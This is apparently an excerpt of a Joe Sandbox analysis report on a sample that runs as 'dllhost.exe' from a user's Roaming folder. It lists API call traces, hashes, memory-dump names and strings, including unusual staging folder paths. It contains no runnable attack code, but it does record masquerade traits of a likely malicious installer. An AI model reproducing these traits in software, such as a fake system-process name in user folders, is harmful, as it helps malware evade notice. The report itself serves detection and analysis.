                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: FilePointer
                                                                              • String ID:
                                                                              • API String ID: 973152223-0
                                                                              • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                              • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                              • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                              • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                              APIs
                                                                              • KiUserCallbackDispatcher.NTDLL(?,00403FDA), ref: 0040420D
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CallbackDispatcherUser
                                                                              • String ID:
                                                                              • API String ID: 2492992576-0
                                                                              • Opcode ID: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
                                                                              • Instruction ID: cd7a90ca9096364f54c072f0977fd0b21683179c1f8a6313e809ce6865a57a73
                                                                              • Opcode Fuzzy Hash: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
                                                                              • Instruction Fuzzy Hash: AFA01231100400ABCE124F50DF08C09BA31B7B43017104439A1400003086320420EB08
                                                                              APIs
                                                                                • Part of subcall function 004052B0: lstrlenW.KERNEL32(Completed,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                                                                • Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,Completed,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                                                                • Part of subcall function 004052B0: lstrcatW.KERNEL32(Completed,00403233,00403233,Completed,00000000,00410EA0,00403094), ref: 0040530B
                                                                                • Part of subcall function 004052B0: SetWindowTextW.USER32(Completed,Completed,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233), ref: 0040531D
                                                                                • Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                                                                • Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                                                                • Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                                                                • Part of subcall function 00405831: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 0040585A
                                                                                • Part of subcall function 00405831: CloseHandle.KERNEL32(?), ref: 00405867
                                                                              • CloseHandle.KERNEL32(?), ref: 00401F47
                                                                                • Part of subcall function 004066D7: WaitForSingleObject.KERNEL32(?,00000064), ref: 004066E8
                                                                                • Part of subcall function 004066D7: GetExitCodeProcess.KERNEL32(?,?), ref: 0040670A
                                                                                • Part of subcall function 00406193: wsprintfW.USER32 ref: 004061A0
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                              • String ID:
                                                                              • API String ID: 2972824698-0
                                                                              • Opcode ID: 0740133e7f1fe2b7b0051514b90c0aefed60c2f2f9dde2b55e99776757eabb61
                                                                              • Instruction ID: bab1dc3541612b80991091494b36371daed99366b6aa6fafa292830653d85492
                                                                              • Opcode Fuzzy Hash: 0740133e7f1fe2b7b0051514b90c0aefed60c2f2f9dde2b55e99776757eabb61
                                                                              • Instruction Fuzzy Hash: 95F09032905121EBCB21FBA18D8899E72A49F01328B2505BBF501F21D1C77D0E518AAE
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404C44
                                                                              • GetDlgItem.USER32(?,00000408), ref: 00404C4F
                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404C99
                                                                              • LoadBitmapW.USER32 ref: 00404CAC
                                                                              • SetWindowLongW.USER32(?,000000FC,00405224), ref: 00404CC5
                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404CD9
                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404CEB
                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404D01
                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D0D
                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D1F
                                                                              • DeleteObject.GDI32(00000000), ref: 00404D22
                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D4D
                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D59
                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404DEF
                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E1A
                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E2E
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404E5D
                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404E6B
                                                                              • ShowWindow.USER32(?,00000005), ref: 00404E7C
                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404F79
                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404FDE
                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404FF3
                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405017
                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405037
                                                                              • ImageList_Destroy.COMCTL32(?), ref: 0040504C
                                                                              • GlobalFree.KERNEL32(?), ref: 0040505C
                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004050D5
                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 0040517E
                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040518D
                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004051AD
                                                                              • ShowWindow.USER32(?,00000000), ref: 004051FB
                                                                              • GetDlgItem.USER32(?,000003FE), ref: 00405206
                                                                              • ShowWindow.USER32(00000000), ref: 0040520D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                              • String ID: $M$N
                                                                              • API String ID: 1638840714-813528018
                                                                              • Opcode ID: 53b2961380e6d72bc5a192face6fddd67d0e305c1ee816909df721ce3db20383
                                                                              • Instruction ID: 31f8c2f88752af3cc61dfe1620f9b722711d108b5774519bd23904c74dbe123e
                                                                              • Opcode Fuzzy Hash: 53b2961380e6d72bc5a192face6fddd67d0e305c1ee816909df721ce3db20383
                                                                              • Instruction Fuzzy Hash: BD0282B0A00209EFDB209F95DD85AAE7BB5FB44314F10417AF610BA2E1C7799D52CF58
                                                                              APIs
                                                                              • GetDiskFreeSpaceW.KERNEL32(004216B8,?,?,0000040F,?,004216B8,004216B8,?,00000001,004216B8,?,?,000003FB,?,?,000003FB), ref: 004048F8
                                                                              • MulDiv.KERNEL32 ref: 00404913
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: DiskFreeSpace
                                                                              • String ID:
                                                                              • API String ID: 1705453755-0
                                                                              • Opcode ID: 3490922e130cbcd6f215e765ee456f67188aa5af01173b4f76d041e006f901ee
                                                                              • Instruction ID: 9a9fd1e5b3774f6fe0778c5d2b37533d6795c7f16e5f693b0d4383bc8e2a2676
                                                                              • Opcode Fuzzy Hash: 3490922e130cbcd6f215e765ee456f67188aa5af01173b4f76d041e006f901ee
                                                                              • Instruction Fuzzy Hash: B251A2F1901209EBCB11EFB1D840AEFB7B9EF84314F24857BE601B61D1D7389A418B69
                                                                              APIs
                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040441C
                                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404430
                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040444D
                                                                              • GetSysColor.USER32(?), ref: 0040445E
                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040446C
                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040447A
                                                                              • lstrlenW.KERNEL32(?), ref: 0040447F
                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040448C
                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044A1
                                                                              • GetDlgItem.USER32(?,0000040A), ref: 004044FA
                                                                              • SendMessageW.USER32(00000000), ref: 00404501
                                                                              • GetDlgItem.USER32(?,000003E8), ref: 0040452C
                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040456F
                                                                              • LoadCursorW.USER32 ref: 0040457D
                                                                              • SetCursor.USER32(00000000), ref: 00404580
                                                                              • LoadCursorW.USER32 ref: 00404599
                                                                              • SetCursor.USER32(00000000), ref: 0040459C
                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 004045CB
                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 004045DD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                              • String ID: ,UZ$: Completed$N
                                                                              APIs
                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                              • FillRect.USER32 ref: 004010E4
                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                              • DrawTextW.USER32(00000000,00429200,000000FF,00000010,00000820), ref: 00401156
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                              • String ID: F
                                                                              APIs
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405ED3
                                                                              • GetShortPathNameW.KERNEL32(?,00426D88,00000400,?,?,00406033,?,?), ref: 00405EDC
                                                                                • Part of subcall function 00405CA3: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CB3
                                                                                • Part of subcall function 00405CA3: lstrlenA.KERNEL32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE5
                                                                              • GetShortPathNameW.KERNEL32(?,00427588,00000400,?,00000000,?,?,00406033,?,?), ref: 00405EF9
                                                                              • wsprintfA.USER32 ref: 00405F17
                                                                              • GetFileSize.KERNEL32(00000000,00000000,00427588,C0000000,00000004,00427588,?,?,?,?,?), ref: 00405F52
                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F61
                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F99
                                                                              • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,00426988,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00405FEF
                                                                              • GlobalFree.KERNEL32(00000000), ref: 00406000
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00406007
                                                                                • Part of subcall function 00405D3E: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\AppData\Roaming\dllhost.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                                                                • Part of subcall function 00405D3E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D64
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                              • String ID: %ls=%ls$[Rename]
                                                                              APIs
                                                                              • CoTaskMemFree.OLE32 ref: 004047E5
                                                                                • Part of subcall function 00405B1D: lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040332A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,7570D4C4,00403589,?,00000006,00000008,0000000A), ref: 00405B23
                                                                                • Part of subcall function 00405B1D: CharPrevW.USER32(?,00000000), ref: 00405B2D
                                                                                • Part of subcall function 00405B1D: lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B3F
                                                                              • lstrcmpiW.KERNEL32(: Completed,?,00000000,?), ref: 00404817
                                                                              • lstrcatW.KERNEL32(?,: Completed,?,00000000,?), ref: 00404823
                                                                              • SetDlgItemTextW.USER32(?,000003FB), ref: 00404835
                                                                              • GetDiskFreeSpaceW.KERNEL32(004216B8,?,?,0000040F,?,004216B8,004216B8,?,00000001,004216B8,?,?,000003FB,?,?,000003FB), ref: 004048F8
                                                                              • MulDiv.KERNEL32 ref: 00404913
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: Freelstrcat$CharDiskItemPrevSpaceTaskTextlstrcmpilstrlen
                                                                              • String ID: : Completed$C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: Char$Next$Prev
                                                                              • String ID: "C:\Users\user\AppData\Roaming\dllhost.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                              APIs
                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 00404265
                                                                              • GetSysColor.USER32(00000000,?), ref: 00404281
                                                                              • SetTextColor.GDI32(?,00000000), ref: 0040428D
                                                                              • SetBkMode.GDI32(?,?), ref: 00404299
                                                                              • GetSysColor.USER32(?), ref: 004042AC
                                                                              • SetBkColor.GDI32(?,?), ref: 004042BC
                                                                              • DeleteObject.GDI32(?), ref: 004042D6
                                                                              • CreateBrushIndirect.GDI32(?), ref: 004042E0
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                              • String ID:
                                                                              APIs
                                                                              • ReadFile.KERNEL32(?,?,?,?), ref: 004026B0
                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026EB
                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040270E
                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402724
                                                                                • Part of subcall function 00405E1F: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E35
                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D0
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                              • String ID: 9
                                                                              • API String ID: 163830602-2366072709
                                                                              • Opcode ID: efe543eef621af3ce3e1f10678013b5d314bdbd7c9d0a35879e6d8519b0983c6
                                                                              • Instruction ID: e157cda522c6117da55a2477cd969df60feaafed97a1adf3b1f02a042ae2ebc2
                                                                              • Opcode Fuzzy Hash: efe543eef621af3ce3e1f10678013b5d314bdbd7c9d0a35879e6d8519b0983c6
                                                                              • Instruction Fuzzy Hash: 9C51F774D10219ABDF20DFA5DA88AAEB779FF04304F50443BE511B72D1D7B89982CB58
APIs
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404B95
• GetMessagePos.USER32 ref: 00404B9D
• ScreenToClient.USER32(?,?), ref: 00404BB7
• SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BC9
• SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404BEF
Strings
Memory Dump Source
• Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
Similarity
• API ID: Message$Send$ClientScreen
• String ID: f
• API String ID: 41195575-1993550816
• Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
• Instruction ID: 6d27a89fd112f7dd13df74400405474d9978eabb633620400ae5318118f47dfb
• Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
• Instruction Fuzzy Hash: CD015E71900218BADB00DB94DD85FFFBBBCAF95711F10412BBA51B61D0D7B4A9018BA4
APIs
• GetDC.USER32(?), ref: 00401DB6
• GetDeviceCaps.GDI32(00000000,0000005A,00000048), ref: 00401DD0
• MulDiv.KERNEL32 ref: 00401DD8
• ReleaseDC.USER32(?,00000000), ref: 00401DE9
• CreateFontIndirectW.GDI32(0040CDB0), ref: 00401E38
Strings
Memory Dump Source
• Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
Similarity
• API ID: CapsCreateDeviceFontIndirectRelease
• String ID: Calibri
• API String ID: 3808545654-1409258342
• Opcode ID: 32b3ac885727d1e190cdd40c39b4cdf091ab3af3085104150676e708dd364a64
• Instruction ID: beb1058faab58ab776b37266111e77616320e0f2a6455f46a6b6c1c153f06785
• Opcode Fuzzy Hash: 32b3ac885727d1e190cdd40c39b4cdf091ab3af3085104150676e708dd364a64
• Instruction Fuzzy Hash: B6015272558241EFE7006BB0AF8AA9A7FB4AB55301F10497EF241B61E2CA7800458B2D
APIs
• SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
